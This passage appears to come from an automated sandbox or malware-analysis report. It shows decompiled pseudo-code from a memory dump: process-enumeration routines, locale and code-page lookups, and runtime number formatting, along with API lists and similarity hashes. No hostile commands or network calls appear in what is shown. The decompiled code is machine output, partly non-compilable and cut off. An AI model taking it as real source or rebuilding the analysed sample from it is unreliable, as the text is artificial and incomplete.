                                                                                                									_t193 = _t169;
                                                                                                									_v720 = _t193;
                                                                                                									_v708 = 0xffffffff;
                                                                                                									_t170 =  *(_t193 + 0x24);
                                                                                                									__eflags = _t170;
                                                                                                									if(_t170 != 0) {
                                                                                                										__eflags = _t170 - _t193;
                                                                                                										_t105 = _t170 != _t193;
                                                                                                										__eflags = _t105;
                                                                                                										_t138 =  *((intOrPtr*)( *_t170 + 0x10))((_t138 & 0xffffff00 | _t105) & 0x000000ff);
                                                                                                										 *(_t193 + 0x24) = 0;
                                                                                                									}
                                                                                                									 *[fs:0x0] = _v16;
                                                                                                									return _t138;
                                                                                                								} else {
                                                                                                									_t177 =  &_v36;
                                                                                                									_t143 =  *((intOrPtr*)( *((intOrPtr*)( *_t169 + 8))))(_t177,  &_v56,  &_v84,  &_v112);
                                                                                                									_t158 = _t143;
                                                                                                									_v4 = 8;
                                                                                                									E00F72D10( &_v84);
                                                                                                									_v4 = 5;
                                                                                                									E00F72D10( &_v112);
                                                                                                									__eflags = _t143;
                                                                                                									if(_t143 != 0) {
                                                                                                										__eflags = _t190 - _v16;
                                                                                                										if(_t190 == _v16) {
                                                                                                											E00F74550( &_v24, _t190,  &_a8);
                                                                                                											_t190 = _v20;
                                                                                                										} else {
                                                                                                											 *_t190 = _a8;
                                                                                                											_t190 =  &(_t190[1]);
                                                                                                											_v20 = _t190;
                                                                                                										}
                                                                                                									}
                                                                                                									_v4 = 3;
                                                                                                									_v44 = 0xfc6b50;
                                                                                                									__eflags = _t188;
                                                                                                									if(_t188 != 0) {
                                                                                                										_push(_t188);
                                                                                                										goto L16;
                                                                                                									}
                                                                                                									goto L17;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_v4 = 3;
                                                                                                								_v44 = 0xfc6b50;
                                                                                                								_push(_t124);
                                                                                                								L16:
                                                                                                								CloseHandle();
                                                                                                								_v40 = 0;
                                                                                                								goto L17;
                                                                                                							}
                                                                                                							goto L29;
                                                                                                							L17:
                                                                                                							_t147 = Process32NextW(_v28, _t195);
                                                                                                							__eflags = _t147;
                                                                                                						} while (_t147 != 0);
                                                                                                						_t186 = _v24;
                                                                                                						_t158 = _v60;
                                                                                                						goto L19;
                                                                                                					}
                                                                                                				} else {
                                                                                                					 *_t158 = 0;
                                                                                                					 *(_t158 + 4) = 0;
                                                                                                					 *((intOrPtr*)(_t158 + 8)) = 0;
                                                                                                					_v24 = 0;
                                                                                                					_v20 = 0;
                                                                                                					_v16 = 0;
                                                                                                					_v32 = 1;
                                                                                                					_v4 = 2;
                                                                                                					_v52 = 0xfc6b50;
                                                                                                					CloseHandle(_t113);
                                                                                                					_v48 = 0;
                                                                                                					_v4 = 0;
                                                                                                					_t176 = _a604;
                                                                                                					if(_t176 != 0) {
                                                                                                						_t177 =  *_t176;
                                                                                                						 *((intOrPtr*)( *_t176 + 0x10))(( &_a568 & 0xffffff00 | _t176 !=  &_a568) & 0x000000ff);
                                                                                                						L23:
                                                                                                						_a604 = 0;
                                                                                                					}
                                                                                                					L24:
                                                                                                					 *[fs:0x0] = _v12;
                                                                                                					return E00F80D7F(_a556 ^ _t195, _t177);
                                                                                                				}
                                                                                                				L29:
                                                                                                			}





















































                                                                                                0x00f737a1
                                                                                                0x00f737ae
                                                                                                0x00f737b0
                                                                                                0x00f737bb
                                                                                                0x00f737bc
                                                                                                0x00f737bf
                                                                                                0x00f737c4
                                                                                                0x00f737c6
                                                                                                0x00f737cf
                                                                                                0x00f737d3
                                                                                                0x00f737d9
                                                                                                0x00f737db
                                                                                                0x00f737de
                                                                                                0x00f737e1
                                                                                                0x00f737e4
                                                                                                0x00f737eb
                                                                                                0x00f737f2
                                                                                                0x00f737f4
                                                                                                0x00f737f6
                                                                                                0x00f737f9
                                                                                                0x00f737fc
                                                                                                0x00f737ff
                                                                                                0x00f73806
                                                                                                0x00f7380c
                                                                                                0x00f7380f
                                                                                                0x00f73816
                                                                                                0x00f73819
                                                                                                0x00f73820
                                                                                                0x00f73884
                                                                                                0x00f73889
                                                                                                0x00f7388c
                                                                                                0x00f73893
                                                                                                0x00f7389a
                                                                                                0x00f738a0
                                                                                                0x00f738a2
                                                                                                0x00f739ed
                                                                                                0x00f739f0
                                                                                                0x00f739f2
                                                                                                0x00f739f5
                                                                                                0x00f739f8
                                                                                                0x00f739ff
                                                                                                0x00f73a06
                                                                                                0x00f73a0d
                                                                                                0x00f73a14
                                                                                                0x00f73a18
                                                                                                0x00f73a1b
                                                                                                0x00f73a22
                                                                                                0x00f73a24
                                                                                                0x00f73a27
                                                                                                0x00f73a2d
                                                                                                0x00f73a2d
                                                                                                0x00f73a34
                                                                                                0x00f73a3b
                                                                                                0x00f73a41
                                                                                                0x00f73a43
                                                                                                0x00f73a4d
                                                                                                0x00f73a4f
                                                                                                0x00f73a4f
                                                                                                0x00f73a56
                                                                                                0x00000000
                                                                                                0x00f73a56
                                                                                                0x00000000
                                                                                                0x00f738b0
                                                                                                0x00f738b0
                                                                                                0x00f738ba
                                                                                                0x00f738c0
                                                                                                0x00f738c2
                                                                                                0x00f738c9
                                                                                                0x00f738cc
                                                                                                0x00f738d0
                                                                                                0x00f738d3
                                                                                                0x00f738eb
                                                                                                0x00f738f0
                                                                                                0x00f738f4
                                                                                                0x00f738f6
                                                                                                0x00f738fa
                                                                                                0x00f738fd
                                                                                                0x00f73904
                                                                                                0x00f73907
                                                                                                0x00f7390e
                                                                                                0x00f73915
                                                                                                0x00f73920
                                                                                                0x00f73920
                                                                                                0x00f73923
                                                                                                0x00f73926
                                                                                                0x00f73926
                                                                                                0x00f73937
                                                                                                0x00f7393c
                                                                                                0x00f73943
                                                                                                0x00f73949
                                                                                                0x00f7394c
                                                                                                0x00f73950
                                                                                                0x00f73956
                                                                                                0x00f73958
                                                                                                0x00f73a88
                                                                                                0x00f73a8d
                                                                                                0x00f73a8e
                                                                                                0x00f73a8f
                                                                                                0x00f73a90
                                                                                                0x00f73a93
                                                                                                0x00f73a95
                                                                                                0x00f73aa0
                                                                                                0x00f73aa1
                                                                                                0x00f73aa2
                                                                                                0x00f73aa3
                                                                                                0x00f73aaa
                                                                                                0x00f73aab
                                                                                                0x00f73aae
                                                                                                0x00f73ab4
                                                                                                0x00f73ab6
                                                                                                0x00f73ab9
                                                                                                0x00f73ac0
                                                                                                0x00f73ac3
                                                                                                0x00f73ac5
                                                                                                0x00f73ac9
                                                                                                0x00f73acb
                                                                                                0x00f73acb
                                                                                                0x00f73ad2
                                                                                                0x00f73ad5
                                                                                                0x00f73ad5
                                                                                                0x00f73adf
                                                                                                0x00f73aeb
                                                                                                0x00f7395e
                                                                                                0x00f7396f
                                                                                                0x00f73973
                                                                                                0x00f73975
                                                                                                0x00f73977
                                                                                                0x00f7397e
                                                                                                0x00f73983
                                                                                                0x00f7398a
                                                                                                0x00f7398f
                                                                                                0x00f73991
                                                                                                0x00f73993
                                                                                                0x00f73996
                                                                                                0x00f739ad
                                                                                                0x00f739b2
                                                                                                0x00f73998
                                                                                                0x00f7399b
                                                                                                0x00f7399d
                                                                                                0x00f739a0
                                                                                                0x00f739a0
                                                                                                0x00f73996
                                                                                                0x00f739b5
                                                                                                0x00f739b9
                                                                                                0x00f739c0
                                                                                                0x00f739c2
                                                                                                0x00f739c4
                                                                                                0x00000000
                                                                                                0x00f739c4
                                                                                                0x00000000
                                                                                                0x00f739c2
                                                                                                0x00f738d5
                                                                                                0x00f738d5
                                                                                                0x00f738d9
                                                                                                0x00f738e0
                                                                                                0x00f739c5
                                                                                                0x00f739c5
                                                                                                0x00f739cb
                                                                                                0x00000000
                                                                                                0x00f739cb
                                                                                                0x00000000
                                                                                                0x00f739d2
                                                                                                0x00f739d9
                                                                                                0x00f739df
                                                                                                0x00f739df
                                                                                                0x00f739e7
                                                                                                0x00f739ea
                                                                                                0x00000000
                                                                                                0x00f739ea
                                                                                                0x00f73822
                                                                                                0x00f73822
                                                                                                0x00f73824
                                                                                                0x00f73827
                                                                                                0x00f7382a
                                                                                                0x00f7382d
                                                                                                0x00f73830
                                                                                                0x00f73833
                                                                                                0x00f7383a
                                                                                                0x00f7383f
                                                                                                0x00f73846
                                                                                                0x00f7384c
                                                                                                0x00f7384f
                                                                                                0x00f73852
                                                                                                0x00f7385a
                                                                                                0x00f73860
                                                                                                0x00f73871
                                                                                                0x00f73a59
                                                                                                0x00f73a59
                                                                                                0x00f73a59
                                                                                                0x00f73a63
                                                                                                0x00f73a68
                                                                                                0x00f73a87
                                                                                                0x00f73a87
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F73806
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F73846
                                                                                                • Process32FirstW.KERNEL32(?,00000000), ref: 00F7389A
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F738BA
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F739C5
                                                                                                • Process32NextW.KERNEL32(?,00000000), ref: 00F739D9
                                                                                                • CloseHandle.KERNEL32(?), ref: 00F73A27
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 708755948-0
                                                                                                • Opcode ID: 4216ffee0ed31df6d467973ad551395f1e377e9cc2172009b632631460fc870c
                                                                                                • Instruction ID: 953a24c8fc1b2ea5b0081de6fe556df14272060a9557ddc466e17cec218d805d
                                                                                                • Opcode Fuzzy Hash: 4216ffee0ed31df6d467973ad551395f1e377e9cc2172009b632631460fc870c
                                                                                                • Instruction Fuzzy Hash: 8D914EB1D01259EFDF10CFA4D985BDEBBB4BF48704F14815AE809AB241D7B45A08EF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00FACD22(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                                                				short _v8;
                                                                                                				short _t17;
                                                                                                				signed int _t18;
                                                                                                				signed int _t23;
                                                                                                				signed int _t25;
                                                                                                				signed int _t26;
                                                                                                				signed int _t27;
                                                                                                				void* _t30;
                                                                                                				void* _t31;
                                                                                                				intOrPtr _t32;
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr* _t36;
                                                                                                				intOrPtr* _t37;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t23 = _a4;
                                                                                                				if(_t23 == 0) {
                                                                                                					L21:
                                                                                                					_t12 = _a8 + 8; // 0x51ceb70f
                                                                                                					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
                                                                                                						_t17 = _v8;
                                                                                                						if(_t17 == 0) {
                                                                                                							_t17 = GetACP();
                                                                                                						}
                                                                                                						L25:
                                                                                                						return _t17;
                                                                                                					}
                                                                                                					L22:
                                                                                                					_t17 = 0;
                                                                                                					goto L25;
                                                                                                				}
                                                                                                				_t18 = 0;
                                                                                                				if( *_t23 == 0) {
                                                                                                					goto L21;
                                                                                                				}
                                                                                                				_t36 = 0xfbebc4;
                                                                                                				_t25 = _t23;
                                                                                                				while(1) {
                                                                                                					_t30 =  *_t25;
                                                                                                					if(_t30 !=  *_t36) {
                                                                                                						break;
                                                                                                					}
                                                                                                					if(_t30 == 0) {
                                                                                                						L7:
                                                                                                						_t26 = _t18;
                                                                                                						L9:
                                                                                                						if(_t26 == 0) {
                                                                                                							goto L21;
                                                                                                						}
                                                                                                						_t37 = 0xfbebcc;
                                                                                                						_t27 = _t23;
                                                                                                						while(1) {
                                                                                                							_t31 =  *_t27;
                                                                                                							if(_t31 !=  *_t37) {
                                                                                                								break;
                                                                                                							}
                                                                                                							if(_t31 == 0) {
                                                                                                								L17:
                                                                                                								if(_t18 != 0) {
                                                                                                									_t17 = E00F9CC85(_t23, _t23);
                                                                                                									goto L25;
                                                                                                								}
                                                                                                								_t8 = _a8 + 8; // 0x51ceb70f
                                                                                                								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_t17 = _v8;
                                                                                                								goto L25;
                                                                                                							}
                                                                                                							_t32 =  *((intOrPtr*)(_t27 + 2));
                                                                                                							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t27 = _t27 + 4;
                                                                                                							_t37 = _t37 + 4;
                                                                                                							if(_t32 != 0) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							goto L17;
                                                                                                						}
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t18 = _t18 | 0x00000001;
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					_t33 =  *((intOrPtr*)(_t25 + 2));
                                                                                                					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t25 = _t25 + 4;
                                                                                                					_t36 = _t36 + 4;
                                                                                                					if(_t33 != 0) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				asm("sbb edx, edx");
                                                                                                				_t26 = _t25 | 0x00000001;
                                                                                                				goto L9;
                                                                                                			}
















                                                                                                0x00facd27
                                                                                                0x00facd28
                                                                                                0x00facd2f
                                                                                                0x00facdd3
                                                                                                0x00facde1
                                                                                                0x00facdec
                                                                                                0x00facdf2
                                                                                                0x00facdf7
                                                                                                0x00facdf9
                                                                                                0x00facdf9
                                                                                                0x00facdff
                                                                                                0x00face04
                                                                                                0x00face04
                                                                                                0x00facdee
                                                                                                0x00facdee
                                                                                                0x00000000
                                                                                                0x00facdee
                                                                                                0x00facd35
                                                                                                0x00facd3a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facd40
                                                                                                0x00facd45
                                                                                                0x00facd47
                                                                                                0x00facd47
                                                                                                0x00facd4d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facd52
                                                                                                0x00facd69
                                                                                                0x00facd69
                                                                                                0x00facd72
                                                                                                0x00facd74
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facd76
                                                                                                0x00facd7b
                                                                                                0x00facd7d
                                                                                                0x00facd7d
                                                                                                0x00facd83
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facd88
                                                                                                0x00facda6
                                                                                                0x00facda8
                                                                                                0x00facdcb
                                                                                                0x00000000
                                                                                                0x00facdd0
                                                                                                0x00facdb8
                                                                                                0x00facdc3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facdc5
                                                                                                0x00000000
                                                                                                0x00facdc5
                                                                                                0x00facd8a
                                                                                                0x00facd92
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facd94
                                                                                                0x00facd97
                                                                                                0x00facd9d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facd9f
                                                                                                0x00facda1
                                                                                                0x00facda3
                                                                                                0x00000000
                                                                                                0x00facda3
                                                                                                0x00facd54
                                                                                                0x00facd5c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facd5e
                                                                                                0x00facd61
                                                                                                0x00facd67
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00facd67
                                                                                                0x00facd6d
                                                                                                0x00facd6f
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,00FAD048,?,00000000), ref: 00FACDBB
                                                                                                • GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,00FAD048,?,00000000), ref: 00FACDE4
                                                                                                • GetACP.KERNEL32(?,?,00FAD048,?,00000000), ref: 00FACDF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: e9291684d7c4eef32a773189d7f40e85a903dfb5713784cccc937f0f73beca1a
                                                                                                • Instruction ID: eaf53fc54d79191adaea02652ec86e5d71bc8af8846791175849a474f3990985
                                                                                                • Opcode Fuzzy Hash: e9291684d7c4eef32a773189d7f40e85a903dfb5713784cccc937f0f73beca1a
                                                                                                • Instruction Fuzzy Hash: 3021C1B2E40105E7DB348F19C900B977BAAFB96B74B168574E92ADB100E732DD41E7D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 52%
                                                                                                			E00F79D40(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                				void* _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				char _v28;
                                                                                                				char _v32;
                                                                                                				void* _v36;
                                                                                                				void* _v40;
                                                                                                				void* _v52;
                                                                                                				void* _v56;
                                                                                                				intOrPtr _v60;
                                                                                                				char _v64;
                                                                                                				signed int _v68;
                                                                                                				intOrPtr _v76;
                                                                                                				void* _v88;
                                                                                                				char _v96;
                                                                                                				signed int _v100;
                                                                                                				void* _v112;
                                                                                                				void* _v116;
                                                                                                				char _v132;
                                                                                                				void* _v136;
                                                                                                				intOrPtr _v140;
                                                                                                				intOrPtr _v144;
                                                                                                				intOrPtr _v148;
                                                                                                				intOrPtr _v152;
                                                                                                				intOrPtr _v156;
                                                                                                				signed int _v168;
                                                                                                				char _v236;
                                                                                                				char _v244;
                                                                                                				void* __ebp;
                                                                                                				signed int _t113;
                                                                                                				signed int _t114;
                                                                                                				signed int _t118;
                                                                                                				void* _t122;
                                                                                                				void* _t123;
                                                                                                				char _t125;
                                                                                                				signed int _t133;
                                                                                                				signed int _t134;
                                                                                                				signed int _t138;
                                                                                                				void* _t142;
                                                                                                				void* _t143;
                                                                                                				intOrPtr _t145;
                                                                                                				signed int _t152;
                                                                                                				void* _t176;
                                                                                                				char _t180;
                                                                                                				signed int _t181;
                                                                                                				void* _t191;
                                                                                                				signed int _t192;
                                                                                                				void* _t203;
                                                                                                				void* _t214;
                                                                                                				intOrPtr _t218;
                                                                                                				intOrPtr _t220;
                                                                                                				signed int _t225;
                                                                                                				intOrPtr _t226;
                                                                                                				signed int _t228;
                                                                                                				intOrPtr _t229;
                                                                                                				signed int _t233;
                                                                                                				signed int _t234;
                                                                                                				void* _t236;
                                                                                                				void* _t237;
                                                                                                				signed int _t239;
                                                                                                				void* _t240;
                                                                                                				signed int _t242;
                                                                                                				signed int _t244;
                                                                                                				intOrPtr _t250;
                                                                                                				void* _t254;
                                                                                                				void* _t263;
                                                                                                
                                                                                                				_t263 = __fp0;
                                                                                                				_t214 = __edx;
                                                                                                				_t176 = __ebx;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb6628);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t237 = _t236 - 0x34;
                                                                                                				_t113 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t114 = _t113 ^ _t233;
                                                                                                				_v20 = _t114;
                                                                                                				_push(_t114);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_v56 = __ecx;
                                                                                                				_t218 = _a16;
                                                                                                				_v36 = 0;
                                                                                                				_v32 = 0;
                                                                                                				_v60 = _a4;
                                                                                                				_v36 = 0;
                                                                                                				_v32 = 0xf;
                                                                                                				_v52 = 0;
                                                                                                				_v8 = 0;
                                                                                                				_t180 =  *((intOrPtr*)(_t218 + 0x1c));
                                                                                                				_t118 =  *(_t218 + 0x14) & 0x00003000;
                                                                                                				_t225 =  *(_t218 + 0x18);
                                                                                                				_t250 = _t180;
                                                                                                				if(_t250 <= 0 && (_t250 < 0 || _t225 == 0) && _t118 != 0x2000) {
                                                                                                					_t225 = 6;
                                                                                                					_t180 = 0;
                                                                                                				}
                                                                                                				_v64 = _t180;
                                                                                                				_t181 = _t225;
                                                                                                				_t254 = _t118 - 0x2000;
                                                                                                				if(_t254 == 0) {
                                                                                                					asm("movsd xmm1, [ebp+0x1c]");
                                                                                                					asm("movaps xmm0, xmm1");
                                                                                                					asm("andps xmm0, [0xfc8b50]");
                                                                                                					asm("comisd xmm0, [0xfc8b48]");
                                                                                                					if(_t254 > 0) {
                                                                                                						_push( &_v64);
                                                                                                						asm("movsd [esp], xmm1");
                                                                                                						E00FA1D9F(_t181, _t214);
                                                                                                						_t237 = _t237 - 8 + 0xc;
                                                                                                						asm("cdq");
                                                                                                						st0 = _t263;
                                                                                                						_t181 = _t214 + (_t214 >> 0x1f) + _t225;
                                                                                                					}
                                                                                                				}
                                                                                                				E00F72410(_t181 + 0x32,  &_v52, _t181 + 0x32, 0);
                                                                                                				_push( *(_t218 + 0x14));
                                                                                                				_t122 = E00F7B1C0(_v56,  &_v28, 0x4c);
                                                                                                				asm("movsd xmm0, [ebp+0x1c]");
                                                                                                				_t184 =  >=  ? _v52 :  &_v52;
                                                                                                				asm("movsd [esp], xmm0");
                                                                                                				_t123 = E00F80080( >=  ? _v52 :  &_v52, _v36, _t122, _t225);
                                                                                                				_t226 = _v60;
                                                                                                				_t186 =  >=  ? _v52 :  &_v52;
                                                                                                				E00F7AD60(_t176, _t218, _t263, _v56, _t226, _a8, _a12, _t218, _a20,  >=  ? _v52 :  &_v52, _t123);
                                                                                                				_t239 = _t237 + 0x40;
                                                                                                				_v8 = 0xffffffff;
                                                                                                				_t125 = _v32;
                                                                                                				if(_t125 < 0x10) {
                                                                                                					L13:
                                                                                                					_v36 = 0;
                                                                                                					_v32 = 0xf;
                                                                                                					_v52 = 0;
                                                                                                					 *[fs:0x0] = _v16;
                                                                                                					return E00F80D7F(_v20 ^ _t233, _t214);
                                                                                                				} else {
                                                                                                					_t191 = _v52;
                                                                                                					_t214 = _t191;
                                                                                                					if(_t125 + 1 < 0x1000) {
                                                                                                						L11:
                                                                                                						if(_t191 != 0) {
                                                                                                							LocalFree(_t191);
                                                                                                						}
                                                                                                						goto L13;
                                                                                                					} else {
                                                                                                						_t191 =  *(_t191 - 4);
                                                                                                						_t214 = _t214 - _t191;
                                                                                                						_t44 = _t214 - 4; // -4
                                                                                                						if(_t44 > 0x1f) {
                                                                                                							E00F98D9C(_t176, _t191, _t214, _t218, __eflags);
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							_push(_t233);
                                                                                                							_t234 = _t239;
                                                                                                							_push(0xffffffff);
                                                                                                							_push(0xfb6628);
                                                                                                							_push( *[fs:0x0]);
                                                                                                							_t240 = _t239 - 0x34;
                                                                                                							_t133 =  *0xfcf00c; // 0xfd8fa683
                                                                                                							_t134 = _t133 ^ _t234;
                                                                                                							_v100 = _t134;
                                                                                                							_push(_t226);
                                                                                                							_push(_t218);
                                                                                                							_push(_t134);
                                                                                                							 *[fs:0x0] =  &_v96;
                                                                                                							_v136 = _t191;
                                                                                                							_t220 = _v64;
                                                                                                							_v116 = 0;
                                                                                                							_v112 = 0;
                                                                                                							_v140 = _v76;
                                                                                                							_v116 = 0;
                                                                                                							_v112 = 0xf;
                                                                                                							_v132 = 0;
                                                                                                							_v88 = 0;
                                                                                                							_t192 =  *(_t220 + 0x1c);
                                                                                                							_t138 =  *(_t220 + 0x14) & 0x00003000;
                                                                                                							_t228 =  *(_t220 + 0x18);
                                                                                                							__eflags = _t192;
                                                                                                							if(__eflags <= 0) {
                                                                                                								if(__eflags < 0) {
                                                                                                									L17:
                                                                                                									__eflags = _t138 - 0x2000;
                                                                                                									if(_t138 != 0x2000) {
                                                                                                										_t228 = 6;
                                                                                                										_t192 = 0;
                                                                                                										__eflags = 0;
                                                                                                									}
                                                                                                								} else {
                                                                                                									__eflags = _t228;
                                                                                                									if(_t228 == 0) {
                                                                                                										goto L17;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							_v68 = _t192;
                                                                                                							_t193 = _t228;
                                                                                                							__eflags = _t138 - 0x2000;
                                                                                                							if(__eflags == 0) {
                                                                                                								asm("movsd xmm1, [ebp+0x1c]");
                                                                                                								asm("movaps xmm0, xmm1");
                                                                                                								asm("andps xmm0, [0xfc8b50]");
                                                                                                								asm("comisd xmm0, [0xfc8b48]");
                                                                                                								if(__eflags > 0) {
                                                                                                									_push( &_v68);
                                                                                                									asm("movsd [esp], xmm1");
                                                                                                									E00FA1D9F(_t193, _t214);
                                                                                                									_t240 = _t240 - 8 + 0xc;
                                                                                                									asm("cdq");
                                                                                                									st0 = _t263;
                                                                                                									_t214 = 0x14f8b589 * ((_v68 ^ _t214) - _t214) * 0x7597 >> 0x20 >> 0xd;
                                                                                                									_t193 = _t214 + (_t214 >> 0x1f) + _t228;
                                                                                                									__eflags = _t214 + (_t214 >> 0x1f) + _t228;
                                                                                                								}
                                                                                                							}
                                                                                                							E00F72410(_t193 + 0x32,  &_v56, _t193 + 0x32, 0);
                                                                                                							_push( *(_t220 + 0x14));
                                                                                                							_t142 = E00F7B1C0(_v60,  &_v32, 0);
                                                                                                							__eflags = _v36 - 0x10;
                                                                                                							asm("movsd xmm0, [ebp+0x1c]");
                                                                                                							_t196 =  >=  ? _v56 :  &_v56;
                                                                                                							asm("movsd [esp], xmm0");
                                                                                                							_t143 = E00F80080( >=  ? _v56 :  &_v56, _v40, _t142, _t228);
                                                                                                							__eflags = _v36 - 0x10;
                                                                                                							_t229 = _v64;
                                                                                                							_t198 =  >=  ? _v56 :  &_v56;
                                                                                                							E00F7AD60(_t176, _t220, _t263, _v60, _t229, _a4, _a8, _t220, _a16,  >=  ? _v56 :  &_v56, _t143);
                                                                                                							_t242 = _t240 + 0x40;
                                                                                                							_v12 = 0xffffffff;
                                                                                                							_t145 = _v36;
                                                                                                							__eflags = _t145 - 0x10;
                                                                                                							if(_t145 < 0x10) {
                                                                                                								L27:
                                                                                                								_v40 = 0;
                                                                                                								_v36 = 0xf;
                                                                                                								_v56 = 0;
                                                                                                								 *[fs:0x0] = _v20;
                                                                                                								__eflags = _v24 ^ _t234;
                                                                                                								return E00F80D7F(_v24 ^ _t234, _t214);
                                                                                                							} else {
                                                                                                								_t203 = _v56;
                                                                                                								_t214 = _t203;
                                                                                                								__eflags = _t145 + 1 - 0x1000;
                                                                                                								if(_t145 + 1 < 0x1000) {
                                                                                                									L25:
                                                                                                									__eflags = _t203;
                                                                                                									if(_t203 != 0) {
                                                                                                										LocalFree(_t203);
                                                                                                									}
                                                                                                									goto L27;
                                                                                                								} else {
                                                                                                									_t203 =  *(_t203 - 4);
                                                                                                									_t93 = _t214 - 4; // -4
                                                                                                									__eflags = _t93 - 0x1f;
                                                                                                									if(__eflags > 0) {
                                                                                                										E00F98D9C(_t176, _t203, _t214, _t220, __eflags);
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										_push(_t234);
                                                                                                										_t244 = (_t242 & 0xfffffff8) - 0x54;
                                                                                                										_t152 =  *0xfcf00c; // 0xfd8fa683
                                                                                                										_v168 = _t152 ^ _t244;
                                                                                                										_push(_t176);
                                                                                                										_push(_t229);
                                                                                                										_push(_t220);
                                                                                                										_push(_v132);
                                                                                                										_push(_v136);
                                                                                                										E00F7A8C0(_t263, _t203, _v156, _v152, _v148, _v144, _v140,  &_v236, E00F80080( &_v236, 0x40, E00F7ACD0(_t203,  &_v244, "Lu"),  *((intOrPtr*)(_v144 + 0x14))));
                                                                                                										__eflags = _v168 ^ _t244 + 0x44;
                                                                                                										return E00F80D7F(_v168 ^ _t244 + 0x44, _t214);
                                                                                                									} else {
                                                                                                										goto L25;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							goto L11;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}







































































                                                                                                0x00f79d40
                                                                                                0x00f79d40
                                                                                                0x00f79d40
                                                                                                0x00f79d43
                                                                                                0x00f79d45
                                                                                                0x00f79d50
